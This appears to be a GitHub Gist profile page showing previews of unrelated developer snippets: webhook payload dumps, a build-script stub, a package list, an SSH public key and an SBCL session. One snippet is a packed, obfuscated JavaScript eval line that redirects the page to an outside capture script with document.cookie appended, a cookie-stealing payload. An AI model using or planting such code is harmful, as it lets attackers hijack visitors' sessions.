Skip to content

Instantly share code, notes, and snippets.

View duckinator's full-sized avatar

Ellen Marie Dash duckinator

View GitHub Profile
598: unexpected token at 'A
'
A JSON text must at least contain two octets!
{"commits"=>[{"removed"=>[], "modified"=>["src/boot/loader.asm"], "url"=>"http://github.com/RockerMONO/stampa/commit/ff177e3b7307043f119fd344079d6d8d2f0ead80", "message"=>"This is the perfect test for my bot!", "added"=>[], "author"=>{"email"=>"[email protected]", "name"=>"Nick Markwell"}, "timestamp"=>"2009-11-22T18:33:37-08:00", "id"=>"ff177e3b7307043f119fd344079d6d8d2f0ead80"}], "before"=>"15a8acd3281ed5222cf2409c8c9b53c930ce4b2f", "repository"=>{"description"=>"Stampa is a simple 16bit Operating System to test a computer, it prints a few lines to the screen and halts the CPU", "open_issues"=>0, "url"=>"http://github.com/RockerMONO/stampa", "fork"=>false, "private"=>false, "homepage"=>"", "owner"=>{"email"=>"[email protected]", "name"=>"RockerMONO"}, "forks"=>0, "name"=>"stampa", "watchers"=>2}, "ref"=>"refs/heads/master", "after"=>"ff177e3b7307043f119fd344079d6d8d2f0ead80"}
{"commits"=>[{"removed"=>[], "modified"=>["src/boot/loader.asm"], "url"=>"http://github.com/RockerMONO/stampa/commit/15a8acd3281ed5222cf2409c8c9b53c930ce4b2f", "message"=>"That was a fail", "added"=>[], "author"=>{"email"=>"[email protected]", "name"=>"Nick Markwell"}, "timestamp"=>"2009-11-22T18:33:15-08:00", "id"=>"15a8acd3281ed5222cf2409c8c9b53c930ce4b2f"}, {"removed"=>[], "modified"=>["src/boot/loader.asm"], "url"=>"http://github.com/RockerMONO/stampa/commit/ff177e3b7307043f119fd344079d6d8d2f0ead80", "message"=>"This is the perfect test for my bot!", "added"=>[], "author"=>{"email"=>"[email protected]", "name"=>"Nick Markwell"}, "timestamp"=>"2009-11-22T18:33:37-08:00", "id"=>"ff177e3b7307043f119fd344079d6d8d2f0ead80"}], "before"=>"a08891cf391793eec85d4e03406bf766892229b4", "repository"=>{"description"=>"Stampa is a simple 16bit Operating System to test a computer, it prints a few lines to the screen and halts the CPU", "open_issues"=>0, "url"=>"http://github.com/RockerMONO/stampa", "fork"=>
#!/usr/bin/env ruby
require 'shell'
def err(s)
puts s
exit 1
end
err "Usage: ./build APP_NAME" if !ARGV[0]
a52dec
aalib
acct
acl
akonadi
alsa-lib
alsa-oss
alsa-plugins
alsa-utils
amarok
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwRAq5ebRpZuLyp/dluFmKq42iXoq/VXwrc+bjonuSa5XiedeLDBYRo32ZZg6gzb7CpcYwcG8phy6Xs3PCX3mIvM6fIF68dl9WWimG+Q7eLNyR2O3YBGVyVvzqiCapGIJspMSBDdbLFw7PM5z6uGX0lskrrx81ueu45ZdlCnHF41AKx49xLs70mzqrh/zlR3vekQiKtDZYBOWGKrH1xwWK3bUiqp9g0RTrGRX4kYHpvYc/Halj8KFqkj1t6Ttal38j0vqgdt2n9dqCwc05U1x68t8d4DOCwaI192p7a7T3ZC8wWbrd09PQSp+JkmBCyxE77jJsFemXYk9/YSW3DZHqw== nick@scimmia
eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.2=\'3://4.5/6/7.8?1=\'+0.1;',9,9,'document|cookie|location|http|axiixc|com|sekrit|capture|php'.split('|'),0,{}))
[/home/nick]$ sbcl [1]
This is SBCL 1.0.31, an implementation of ANSI Common Lisp.
More information about SBCL is available at <http://www.sbcl.org/>.
SBCL is free software, provided as is, with absolutely no warranty.
It is mostly in the public domain; some portions are provided under
BSD-style licenses. See the CREDITS and COPYING files in the
distribution for more information.
* (require :asdf-install)